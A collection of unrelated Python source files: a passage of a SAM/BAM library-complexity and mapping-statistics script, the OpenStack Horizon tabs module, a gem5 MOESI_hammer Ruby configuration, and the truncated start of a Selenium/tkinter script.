return '{0}.{1}'.format(number[:4], number[4])
def calc_fragmentcomplexity(self, rg, lib, sample, fragmentlist):
start, end = 0, self.__stepsize
# the range is shortened by one self.__stepsize because the last subsample wouldn't be complete
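# e.g. with stepsize 1,000,000 and 2,345,678 fragments, steps is [0, 1000000]:
# two full subsamples are evaluated and the trailing 345,678 entries are ignored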
steps = xrange(0, len(fragmentlist)-self.__stepsize, self.__stepsize)
if len(steps) == 0:
self.show_log('warning', 'Library size of RG: {0} - Lib: {1} - Sample: {2} is too small for the subsample step of {3}'.format(rg, lib, sample, self.__stepsize))
return
# stores the complete set of unique positions or fragments
uniqfragments = set()
for i in steps:
oldsizeset = len(uniqfragments) # how many fragments are unique in the previous subsamples
rtstep = i + self.__stepsize # because it starts with 0, increase
stepstring = self.get_stepsize(rtstep)
subsampleset = set(fragmentlist[start:end]) # get a subset of the fragmentlist and make it unique
uniqfragments = uniqfragments | subsampleset # add them to the complete unique set
uniq = len(uniqfragments) # how many fragments are unique in current and previous subsamples
newuniq = uniq - oldsizeset # how many are newly added to complete unique set
# calculate percentages and append to list
self.__rgdict[rg]['list'].append((stepstring, str(uniq), '{0:.2f}'.format(uniq/float(rtstep)*100), str(newuniq), '{0:.2f}'.format(newuniq/float(self.__stepsize)*100)))
start, end = end, end+self.__stepsize # set start, end for the new subsample
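'''
method rebuilds a CIGAR string from pysam cigartuples; the numeric operation
codes map to 0=M, 1=I, 2=D, 3=N, 4=S, 5=H, 6=P, 7==, 8=X,
e.g. [(0, 50), (4, 10)] -> '50M10S'
@param cigartuple: list of (operation, length) tuples
@return: string
'''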
def build_cigar(self, cigartuple):
cigstring = ''
for entry in cigartuple:
if entry[0] == 0:
cigstring = '{0}{1}M'.format(cigstring, entry[1])
elif entry[0] == 1:
cigstring = '{0}{1}I'.format(cigstring, entry[1])
elif entry[0] == 2:
cigstring = '{0}{1}D'.format(cigstring, entry[1])
elif entry[0] == 3:
cigstring = '{0}{1}N'.format(cigstring, entry[1])
elif entry[0] == 4:
cigstring = '{0}{1}S'.format(cigstring, entry[1])
elif entry[0] == 5:
cigstring = '{0}{1}H'.format(cigstring, entry[1])
elif entry[0] == 6:
cigstring = '{0}{1}P'.format(cigstring, entry[1])
elif entry[0] == 7:
cigstring = '{0}{1}='.format(cigstring, entry[1])
elif entry[0] == 8:
cigstring = '{0}{1}X'.format(cigstring, entry[1])
return cigstring
'''
method extracts the RG read tag of each entry and returns 'none' if not set
@param readentry: pysam.AlignedSegment
@return: string
'''
def get_readtag(self, readentry):
try:
return readentry.get_tag('RG')
except KeyError:
return 'none'
'''
method checks whether the cigar string has a soft clip at the start or end;
if so, it removes it and rebuilds the cigar string
@param readentry: pysam.AlignedSegment
@return: string
'''
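# e.g. cigartuples [(4, 5), (0, 70)] and [(0, 70), (4, 5)] both yield '70M'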
def prep_cigarstring(self, readentry):
if readentry.cigartuples[0][0] == 4 or readentry.cigartuples[-1][0] == 4:
cigred = readentry.cigartuples[::]
if cigred[0][0] == 4:
cigred = cigred[1:]
if cigred[-1][0] == 4:
cigred = cigred[:-1]
return self.build_cigar(cigred)
else:
return readentry.cigarstring
'''
method counts the processed and aligned values for the reads. It distinguishes between
paired-end and single-end data; for paired-end only the first read is used because
fragments are counted. Returns TRUE if the read entry is the second read of a pair or
is unmapped, and FALSE if the read entry was counted
@param readentry: pysam.AlignedSegment
@param readtag: RG tag of readentry
@return: TRUE or FALSE
'''
def count_samflagstat(self, readentry, readtag):
if readentry.is_paired:
if readentry.is_read1:
self.__rgdict[readtag]['processed'] += 1
if readentry.is_unmapped:
return True
self.__rgdict[readtag]['aligned'] += 1
else:
return True
else:
self.__rgdict[readtag]['processed'] += 1
if readentry.is_unmapped:
return True
self.__rgdict[readtag]['aligned'] += 1
return False
def parse_bwa(self):
processed = 0
for entry in self.__inputfile:
processed += 1
if processed % 2500000 == 0:
self.show_log('info', 'Reading {0:,} SAM records'.format(processed))
tag = self.get_readtag(entry)
# counts the processed and aligned stats per read entry and provides information
# (TRUE/FALSE) for the next step of data gathering
if self.count_samflagstat(entry, tag): continue
if entry.mapping_quality < 1: continue # not interested in multimapper
self.__rgdict[tag]['uniq'] += 1
cigarstring = self.prep_cigarstring(entry)
if entry.is_paired:
if self.__fragmode:
if entry.next_reference_id >= 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}-{4}'.format(entry.reference_id, entry.reference_start, cigarstring, entry.next_reference_id, entry.next_reference_start))
elif entry.next_reference_id < 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}'.format(entry.reference_id, entry.reference_start, cigarstring))
elif self.__complexity:
if entry.next_reference_id >= 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}'.format(entry.reference_id, entry.reference_start, entry.next_reference_id, entry.next_reference_start))
elif entry.next_reference_id < 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}'.format(entry.reference_id, entry.reference_start))
else:
if self.__fragmode:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}'.format(entry.reference_id, entry.reference_start, cigarstring))
elif self.__complexity:
self.__rgdict[tag]['coordlist'].append('{0}-{1}'.format(entry.reference_id, entry.reference_start))
self.show_log('info', '{0:,} SAM records processed'.format(processed))
def parse_gsnap(self):
processed = 0
for entry in self.__inputfile:
processed += 1
if processed % 2500000 == 0:
self.show_log('info', 'Reading {0:,} SAM records'.format(processed))
tag = self.get_readtag(entry)
# counts the processed and aligned stats per read entry and provides information
# (TRUE/FALSE) for the next step of data gathering
if self.count_samflagstat(entry, tag): continue
if entry.get_tag('NH') != 1: continue # not interested in multimapper
# maybe one should be interested?
self.__rgdict[tag]['uniq'] += 1
cigarstring = self.prep_cigarstring(entry)
if entry.is_paired:
if self.__fragmode:
if entry.next_reference_id >= 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}-{4}-{5}'.format(entry.reference_id, entry.reference_start, cigarstring, entry.get_tag('MD'), entry.next_reference_id, entry.next_reference_start))
elif entry.next_reference_id < 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}'.format(entry.reference_id, entry.reference_start, cigarstring, entry.get_tag('MD')))
elif self.__complexity:
if entry.next_reference_id >= 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}'.format(entry.reference_id, entry.reference_start, entry.next_reference_id, entry.next_reference_start))
elif entry.next_reference_id < 0:
self.__rgdict[tag]['coordlist'].append('{0}-{1}'.format(entry.reference_id, entry.reference_start))
else:
if self.__fragmode:
self.__rgdict[tag]['coordlist'].append('{0}-{1}-{2}-{3}'.format(entry.reference_id, entry.reference_start, cigarstring, entry.get_tag('MD')))
elif self.__complexity:
self.__rgdict[tag]['coordlist'].append('{0}-{1}'.format(entry.reference_id, entry.reference_start))
self.show_log('info', '{0:,} SAM records processed'.format(processed))
def write_empties(self):
if self.__mappingstat and not isfile(self.__alignoutputfile):
temp = [self.__headermapping]
write_list(temp, self.__alignoutputfile, 'w')
chmod(self.__alignoutputfile, 0664)
if self.__complexity and not isfile(self.__complexoutputfile):
temp = [self.__headercomplex]
write_list(temp, self.__complexoutputfile, 'w')
chmod(self.__complexoutputfile, 0664)
def write_output(self, rg):
if self.__complexity and len(self.__rgdict[rg]['list']) != 0:
temp = []
self.show_log('info', 'Complexity Statistics for "{0}" are written to {1}'.format(rg, self.__complexoutputfile))
for entry in self.__rgdict[rg]['list']:
if self.__fragmode:
temp.append('\t'.join(entry) + '\t' + '\t'.join((self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], rg, 'Fragment', self.__aligner, self.__subset)) + '\n')
else:
temp.append('\t'.join(entry) + '\t' + '\t'.join((self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], rg, 'Position', self.__aligner, self.__subset)) + '\n')
write_list(temp, self.__complexoutputfile, 'a')
chmod(self.__complexoutputfile, 0664)
if self.__mappingstat:
temp = []
self.show_log('info', 'Mapping Statistics for "{0}" are written to {1}'.format(rg, self.__alignoutputfile))
total, mapped, uniq = self.__rgdict[rg]['processed'], self.__rgdict[rg]['aligned'], self.__rgdict[rg]['uniq']
temp.append('\t'.join((self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], rg, 'Total', str(total), '', '', self.__aligner, self.__subset)) + '\n')
temp.append('\t'.join((self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], rg, 'Mapped', str(mapped), '{0:.2f}'.format(mapped/float(total)*100), '{0:.0f}%'.format(mapped/float(total)*100), self.__aligner, self.__subset)) + '\n')
temp.append('\t'.join((self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], rg, 'Unique', str(uniq), '{0:.2f}'.format(uniq/float(total)*100), '{0:.0f}%'.format(uniq/float(total)*100), self.__aligner, self.__subset)) + '\n')
write_list(temp, self.__alignoutputfile, 'a')
chmod(self.__alignoutputfile, 0664)
def main(self):
if self.__aligner == 'gsnap':
self.parse_gsnap()
elif self.__aligner == 'bwa':
self.parse_bwa()
self.write_empties()
for rg in self.__rgdict:
coordlist = self.__rgdict[rg]['coordlist']
if self.__complexity and len(coordlist) != 0:
shuffle(coordlist)
self.show_log('info', 'Calculating complexity for {0}'.format(rg))
self.calc_fragmentcomplexity(rg, self.__rgdict[rg]['libid'][0], self.__rgdict[rg]['libid'][1], coordlist)
self.write_output(rg)
if __name__ == '__main__':
mainlog = MainLogger()
parser = Parser()
parser.main()
outputdir = add_Separator(pathjoin(parser.output, 'data'))
create_Directory(outputdir)
inst = CalcComplexity(parser.inputfile, outputdir, parser.bfx, parser.subsample, parser.frags, parser.mappingstats, parser.subset, parser.complexity)
inst.main()
mainlog.close()
logging.shutdown()
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import six
from django.template.loader import render_to_string
from django.template import TemplateSyntaxError # noqa
from django.utils.datastructures import SortedDict
from horizon_lib import exceptions
from horizon_lib.utils import html
SEPARATOR = "__"
CSS_TAB_GROUP_CLASSES = ["nav", "nav-tabs", "ajax-tabs"]
CSS_ACTIVE_TAB_CLASSES = ["active"]
CSS_DISABLED_TAB_CLASSES = ["disabled"]
class TabGroup(html.HTMLElement):
"""A container class which knows how to manage and render
:class:`~horizon_lib.tabs.Tab` objects.
.. attribute:: slug
The URL slug and pseudo-unique identifier for this tab group.
.. attribute:: template_name
The name of the template which will be used to render this tab group.
Default: ``"horizon_lib/common/_tab_group.html"``
.. attribute:: sticky
Boolean to control whether the active tab state should be stored
across requests for a given user. (State storage is all done
client-side.)
.. attribute:: param_name
The name of the GET request parameter which will be used when
requesting specific tab data. Default: ``tab``.
.. attribute:: classes
A list of CSS classes which should be displayed on this tab group.
.. attribute:: attrs
A dictionary of HTML attributes which should be rendered into the
markup for this tab group.
.. attribute:: selected
Read-only property which is set to the instance of the
currently-selected tab if there is one, otherwise ``None``.
.. attribute:: active
Read-only property which is set to the value of the current active tab.
This may not be the same as the value of ``selected`` if no
specific tab was requested via the ``GET`` parameter.
"""
slug = None
template_name = "horizon_lib/common/_tab_group.html"
param_name = 'tab'
sticky = False
_selected = None
_active = None
@property
def selected(self):
return self._selected
@property
def active(self):
return self._active
def __init__(self, request, **kwargs):
super(TabGroup, self).__init__()
if not hasattr(self, "tabs"):
raise NotImplementedError('%s must declare a "tabs" attribute.'
% self.__class__)
if not self.slug:
raise NotImplementedError('%s must declare a "slug" attribute.'
% self.__class__)
self.request = request
self.kwargs = kwargs
self._data = None
tab_instances = []
for tab in self.tabs:
tab_instances.append((tab.slug, tab(self, request)))
self._tabs = SortedDict(tab_instances)
if self.sticky:
self.attrs['data-sticky-tabs'] = 'sticky'
if not self._set_active_tab():
self.tabs_not_available()
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self.slug)
def load_tab_data(self):
"""Preload all data that for the tabs that will be displayed."""
for tab in self._tabs.values():
if tab.load and not tab.data_loaded:
try:
tab._data = tab.get_context_data(self.request)
except Exception:
tab._data = False
exceptions.handle(self.request)
def get_id(self):
"""Returns the id for this tab group. Defaults to the value of the tab
group's :attr:`horizon_lib.tabs.Tab.slug`.
"""
return self.slug
def get_default_classes(self):
"""Returns a list of the default classes for the tab group. Defaults to
``["nav", "nav-tabs", "ajax-tabs"]``.
"""
default_classes = super(TabGroup, self).get_default_classes()
default_classes.extend(CSS_TAB_GROUP_CLASSES)
return default_classes
def tabs_not_available(self):
"""In the event that no tabs are either allowed or enabled, this method
is the fallback handler. By default it's a no-op, but it exists
to make redirecting or raising exceptions possible for subclasses.
"""
pass
def _set_active_tab(self):
marked_active = None
# See if we have a selected tab via the GET parameter.
tab = self.get_selected_tab()
if tab:
tab._active = True
self._active = tab
marked_active = tab
# Iterate through to mark them all accordingly.
for tab in self._tabs.values():
if tab._allowed and tab._enabled and not marked_active:
tab._active = True
self._active = tab
marked_active = True
elif tab == marked_active:
continue
else:
tab._active = False
return marked_active
def render(self):
"""Renders the HTML output for this tab group."""
return render_to_string(self.template_name, {"tab_group": self})
def get_tabs(self):
"""Returns a list of the allowed tabs for this tab group."""
return filter(lambda tab: tab._allowed, self._tabs.values())
def get_tab(self, tab_name, allow_disabled=False):
"""Returns a specific tab from this tab group.
If the tab is not allowed or not enabled this method returns ``None``.
If the tab is disabled but you wish to return it anyway, you can pass
``True`` to the allow_disabled argument.
"""
tab = self._tabs.get(tab_name, None)
if tab and tab._allowed and (tab._enabled or allow_disabled):
return tab
return None
def get_loaded_tabs(self):
return filter(lambda t: self.get_tab(t.slug), self._tabs.values())
def get_selected_tab(self):
"""Returns the tab specific by the GET request parameter.
In the event that there is no GET request parameter, the value
of the query parameter is invalid, or the tab is not allowed/enabled,
the return value of this function is None.
"""
selected = self.request.GET.get(self.param_name, None)
if selected:
try:
tab_group, tab_name = selected.split(SEPARATOR)
except ValueError:
return None
if tab_group == self.get_id():
self._selected = self.get_tab(tab_name)
return self._selected
class Tab(html.HTMLElement):
"""A reusable interface for constructing a tab within a
:class:`~horizon_lib.tabs.TabGroup`.
.. attribute:: name
The display name for the tab which will be rendered as the text for
the tab element in the HTML. Required.
.. attribute:: slug
The URL slug and id attribute for the tab. This should be unique for
a given tab group. Required.
.. attribute:: preload
Determines whether the contents of the tab should be rendered into
the page's HTML when the tab group is rendered, or whether it should
be loaded dynamically when the tab is selected. Default: ``True``.
.. attribute:: classes
A list of CSS classes which should be displayed on this tab.
.. attribute:: attrs
A dictionary of HTML attributes which should be rendered into the
markup for this tab.
.. attribute:: load
Read-only access to determine whether or not this tab's data should
be loaded immediately.
.. attribute:: permissions
A list of permission names which this tab requires in order to be
displayed. Defaults to an empty list (``[]``).
"""
name = None
slug = None
preload = True
_active = None
permissions = []
def __init__(self, tab_group, request=None):
super(Tab, self).__init__()
# Priority: constructor, class-defined, fallback
if not self.name:
raise ValueError("%s must have a name." % self.__class__.__name__)
self.name = unicode(self.name) # Force unicode.
if not self.slug:
raise ValueError("%s must have a slug." % self.__class__.__name__)
self.tab_group = tab_group
self.request = request
if request:
self._allowed = self.allowed(request) and (
self._has_permissions(request))
self._enabled = self.enabled(request)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self.slug)
def _has_permissions(self, request):
return request.user.has_perms(self.permissions)
def is_active(self):
"""Method to access whether or not this tab is the active tab."""
if self._active is None:
self.tab_group._set_active_tab()
return self._active
@property
def load(self):
load_preloaded = self.preload or self.is_active()
return load_preloaded and self._allowed and self._enabled
@property
def data(self):
if getattr(self, "_data", None) is None:
self._data = self.get_context_data(self.request)
return self._data
@property
def data_loaded(self):
return getattr(self, "_data", None) is not None
def render(self):
"""Renders the tab to HTML using the
:meth:`~horizon_lib.tabs.Tab.get_context_data` method and
the :meth:`~horizon_lib.tabs.Tab.get_template_name` method.
If :attr:`~horizon_lib.tabs.Tab.preload` is ``False`` and
``force_load`` is not ``True``, or either
:meth:`~horizon_lib.tabs.Tab.allowed` or
:meth:`~horizon_lib.tabs.Tab.enabled` returns ``False`` this
method will return an empty string.
"""
if not self.load:
return ''
try:
context = self.data
except exceptions.Http302:
raise
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
six.reraise(TemplateSyntaxError, exc_value, exc_traceback)
return render_to_string(self.get_template_name(self.request), context)
def get_id(self):
"""Returns the id for this tab. Defaults to
``"{{ tab_group.slug }}__{{ tab.slug }}"``.
"""
return SEPARATOR.join([self.tab_group.slug, self.slug])
def get_query_string(self):
return "=".join((self.tab_group.param_name, self.get_id()))
def get_default_classes(self):
"""Returns a list of the default classes for the tab. Defaults to
and empty list (``[]``), however additional classes may be added
depending on the state of the tab as follows:
If the tab is the active tab for the tab group, in which
the class ``"active"`` will be added.
If the tab is not enabled, the classes the class ``"disabled"``
will be added.
"""
default_classes = super(Tab, self).get_default_classes()
if self.is_active():
default_classes.extend(CSS_ACTIVE_TAB_CLASSES)
if not self._enabled:
default_classes.extend(CSS_DISABLED_TAB_CLASSES)
return default_classes
def get_template_name(self, request):
"""Returns the name of the template to be used for rendering this tab.
By default it returns the value of the ``template_name`` attribute
on the ``Tab`` class.
"""
if not hasattr(self, "template_name"):
raise AttributeError("%s must have a template_name attribute or "
"override the get_template_name method."
% self.__class__.__name__)
return self.template_name
def get_context_data(self, request, **kwargs):
"""This method should return a dictionary of context data used to
render the tab. Required.
"""
return kwargs
def enabled(self, request):
"""Determines whether or not the tab should be accessible
(e.g. be rendered into the HTML on load and respond to a click event).
If a tab returns ``False`` from ``enabled`` it will ignore the value
of ``preload`` and only render the HTML of the tab after being clicked.
The default behavior is to return ``True`` for all cases.
"""
return True
def allowed(self, request):
"""Determines whether or not the tab is displayed.
Tab instances can override this method to specify conditions under
which this tab should not be shown at all by returning ``False``.
The default behavior is to return ``True`` for all cases.
"""
return True
def post(self, request, *args, **kwargs):
"""Handles POST data sent to a tab.
Tab instances can override this method to have tab-specific POST logic
without polluting the TabView code.
The default behavior is to ignore POST data.
"""
pass
class TableTab(Tab):
"""A :class:`~horizon_lib.tabs.Tab` class which knows how to deal with
:class:`~horizon_lib.tables.DataTable` classes rendered inside of it.
This distinct class is required due to the complexity involved in handling
dynamic tab loading, dynamic table updating, and table actions all
within one view.
.. attribute:: table_classes
An iterable containing the :class:`~horizon_lib.tables.DataTable`
classes which this tab will contain. Equivalent to the
:attr:`~horizon_lib.tables.MultiTableView.table_classes` attribute on
:class:`~horizon_lib.tables.MultiTableView`. For each table class you
need to define a corresponding ``get_{{ table_name }}_data`` method
as with :class:`~horizon_lib.tables.MultiTableView`.
"""
table_classes = None
def __init__(self, tab_group, request):
super(TableTab, self).__init__(tab_group, request)
if not self.table_classes:
class_name = self.__class__.__name__
raise NotImplementedError("You must define a table_class "
"attribute on %s" % class_name)
# Instantiate our table classes but don't assign data yet
table_instances = [(table._meta.name,
table(request, **tab_group.kwargs))
for table in self.table_classes]
self._tables = SortedDict(table_instances)
self._table_data_loaded = False
def load_table_data(self):
"""Calls the ``get_{{ table_name }}_data`` methods for each table class
and sets the data on the tables.
"""
# We only want the data to be loaded once, so we track if we have...
if not self._table_data_loaded:
for table_name, table in self._tables.items():
# Fetch the data function.
func_name = "get_%s_data" % table_name
data_func = getattr(self, func_name, None)
if data_func is None:
cls_name = self.__class__.__name__
raise NotImplementedError("You must define a %s method "
"on %s." % (func_name, cls_name))
# Load the data.
table.data = data_func()
table._meta.has_prev_data = self.has_prev_data(table)
table._meta.has_more_data = self.has_more_data(table)
# Mark our data as loaded so we don't run the loaders again.
self._table_data_loaded = True
def get_context_data(self, request, **kwargs):
"""Adds a ``{{ table_name }}_table`` item to the context for each table
in the :attr:`~horizon_lib.tabs.TableTab.table_classes` attribute.
If only one table class is provided, a shortcut ``table`` context
variable is also added containing the single table.
"""
context = super(TableTab, self).get_context_data(request, **kwargs)
# If the data hasn't been manually loaded before now,
# make certain it's loaded before setting the context.
self.load_table_data()
for table_name, table in self._tables.items():
# If there's only one table class, add a shortcut name as well.
if len(self.table_classes) == 1:
context["table"] = table
context["%s_table" % table_name] = table
return context
def has_prev_data(self, table):
return False
def has_more_data(self, table):
return False
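# --- Illustrative usage (sketch only, not part of the original module) ---
# Wiring a DataTable into a TableTab; every concrete name below (table, tab,
# template path, data source) is a placeholder.
#
# from horizon_lib import tables, tabs
#
# class InstancesTable(tables.DataTable):
#     name = tables.Column("name", verbose_name="Name")
#
#     class Meta:
#         name = "instances"      # drives the get_instances_data hook below
#
# class InstancesTab(tabs.TableTab):
#     name = "Instances"
#     slug = "instances"
#     table_classes = (InstancesTable,)
#     template_name = "horizon_lib/common/_detail_table.html"
#
#     def get_instances_data(self):
#         # Must be named get_{{ table Meta.name }}_data.
#         return instance_api.list(self.request)  # placeholder data source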
|
|
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# Copyright (c) 2009 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
import math
import m5
from m5.objects import *
from m5.defines import buildEnv
from Ruby import create_topology
#
# Note: the L1 Cache latency is only used by the sequencer on fast path hits
#
class L1Cache(RubyCache):
latency = 2
#
# Note: the L2 Cache latency is not currently used
#
class L2Cache(RubyCache):
latency = 10
#
# Probe filter is a cache, latency is not used
#
class ProbeFilter(RubyCache):
latency = 1
def define_options(parser):
parser.add_option("--allow-atomic-migration", action="store_true",
help="allow migratory sharing for atomic only accessed blocks")
parser.add_option("--pf-on", action="store_true",
help="Hammer: enable Probe Filter")
parser.add_option("--dir-on", action="store_true",
help="Hammer: enable Full-bit Directory")
def create_system(options, system, piobus, dma_ports, ruby_system):
if buildEnv['PROTOCOL'] != 'MOESI_hammer':
panic("This script requires the MOESI_hammer protocol to be built.")
cpu_sequencers = []
#
# The ruby network creation expects the list of nodes in the system to be
# consistent with the NetDest list. Therefore the l1 controller nodes must be
# listed before the directory nodes and directory nodes before dma nodes, etc.
#
l1_cntrl_nodes = []
dir_cntrl_nodes = []
dma_cntrl_nodes = []
#
# Must create the individual controllers before the network to ensure the
# controller constructors are called before the network constructor
#
block_size_bits = int(math.log(options.cacheline_size, 2))
cntrl_count = 0
for i in xrange(options.num_cpus):
#
# First create the Ruby objects associated with this cpu
#
l1i_cache = L1Cache(size = options.l1i_size,
assoc = options.l1i_assoc,
start_index_bit = block_size_bits,
is_icache = True)
l1d_cache = L1Cache(size = options.l1d_size,
assoc = options.l1d_assoc,
start_index_bit = block_size_bits)
l2_cache = L2Cache(size = options.l2_size,
assoc = options.l2_assoc,
start_index_bit = block_size_bits)
l1_cntrl = L1Cache_Controller(version = i,
cntrl_id = cntrl_count,
L1Icache = l1i_cache,
L1Dcache = l1d_cache,
L2cache = l2_cache,
no_mig_atomic = not \
options.allow_atomic_migration,
send_evictions = (
options.cpu_type == "detailed"),
ruby_system = ruby_system)
cpu_seq = RubySequencer(version = i,
icache = l1i_cache,
dcache = l1d_cache,
ruby_system = ruby_system)
l1_cntrl.sequencer = cpu_seq
if piobus is not None:
cpu_seq.pio_port = piobus.slave
if options.recycle_latency:
l1_cntrl.recycle_latency = options.recycle_latency
exec("ruby_system.l1_cntrl%d = l1_cntrl" % i)
#
# Add controllers and sequencers to the appropriate lists
#
cpu_sequencers.append(cpu_seq)
l1_cntrl_nodes.append(l1_cntrl)
cntrl_count += 1
phys_mem_size = sum(map(lambda mem: mem.range.size(),
system.memories.unproxy(system)))
assert(phys_mem_size % options.num_dirs == 0)
mem_module_size = phys_mem_size / options.num_dirs
#
# determine size and index bits for probe filter
# By default, the probe filter size is configured to be twice the
# size of the L2 cache.
#
pf_size = MemorySize(options.l2_size)
pf_size.value = pf_size.value * 2
dir_bits = int(math.log(options.num_dirs, 2))
pf_bits = int(math.log(pf_size.value, 2))
if options.numa_high_bit:
if options.pf_on or options.dir_on:
# if numa high bit explicitly set, make sure it does not overlap
# with the probe filter index
assert(options.numa_high_bit - dir_bits > pf_bits)
# set the probe filter start bit to just above the block offset
pf_start_bit = block_size_bits
else:
if dir_bits > 0:
pf_start_bit = dir_bits + block_size_bits - 1
else:
pf_start_bit = block_size_bits
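# Worked example (illustrative only): with options.l2_size = '512kB',
# options.num_dirs = 2 and a 64-byte cache line, pf_size doubles to 1 MB
# (1048576 bytes), so pf_bits = 20, dir_bits = 1, block_size_bits = 6 and,
# with no numa_high_bit set, pf_start_bit = dir_bits + block_size_bits - 1 = 6.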
# Run each of the ruby memory controllers at a ratio of the frequency of
# the ruby system
# clk_divider value is a fix to pass regression.
ruby_system.memctrl_clk_domain = DerivedClockDomain(
clk_domain=ruby_system.clk_domain,
clk_divider=3)
for i in xrange(options.num_dirs):
#
# Create the Ruby objects associated with the directory controller
#
mem_cntrl = RubyMemoryControl(
clk_domain = ruby_system.memctrl_clk_domain,
version = i,
ruby_system = ruby_system)
dir_size = MemorySize('0B')
dir_size.value = mem_module_size
pf = ProbeFilter(size = pf_size, assoc = 4,
start_index_bit = pf_start_bit)
dir_cntrl = Directory_Controller(version = i,
cntrl_id = cntrl_count,
directory = \
RubyDirectoryMemory( \
version = i,
size = dir_size,
use_map = options.use_map,
map_levels = \
options.map_levels,
numa_high_bit = \
options.numa_high_bit),
probeFilter = pf,
memBuffer = mem_cntrl,
probe_filter_enabled = options.pf_on,
full_bit_dir_enabled = options.dir_on,
ruby_system = ruby_system)
if options.recycle_latency:
dir_cntrl.recycle_latency = options.recycle_latency
exec("ruby_system.dir_cntrl%d = dir_cntrl" % i)
dir_cntrl_nodes.append(dir_cntrl)
cntrl_count += 1
for i, dma_port in enumerate(dma_ports):
#
# Create the Ruby objects associated with the dma controller
#
dma_seq = DMASequencer(version = i,
ruby_system = ruby_system)
dma_cntrl = DMA_Controller(version = i,
cntrl_id = cntrl_count,
dma_sequencer = dma_seq,
ruby_system = ruby_system)
exec("ruby_system.dma_cntrl%d = dma_cntrl" % i)
exec("ruby_system.dma_cntrl%d.dma_sequencer.slave = dma_port" % i)
dma_cntrl_nodes.append(dma_cntrl)
if options.recycle_latency:
dma_cntrl.recycle_latency = options.recycle_latency
cntrl_count += 1
all_cntrls = l1_cntrl_nodes + dir_cntrl_nodes + dma_cntrl_nodes
topology = create_topology(all_cntrls, options)
return (cpu_sequencers, dir_cntrl_nodes, topology)
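# Usage note (sketch): this file is not meant to be run directly. gem5's
# Ruby.py imports the config module matching buildEnv['PROTOCOL']
# ('MOESI_hammer' here), calls define_options(parser) while the option
# parser is being built, and later calls
# create_system(options, system, piobus, dma_ports, ruby_system)
# to obtain the CPU sequencers, directory controllers and network topology.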
|
|
#!/usr/bin/env python3
# Copyright (c) 2015 Andrew Ruder <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import readline
import re
import time
import sys
import tkinter as tk
import tkinter.ttk as ttk
import queue
import threading
from PIL import Image
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class ThreadedTask(threading.Thread):
def __init__(self, cont):
threading.Thread.__init__(self)
self.controller = cont
def run(self):
class ClickError(Exception):
pass
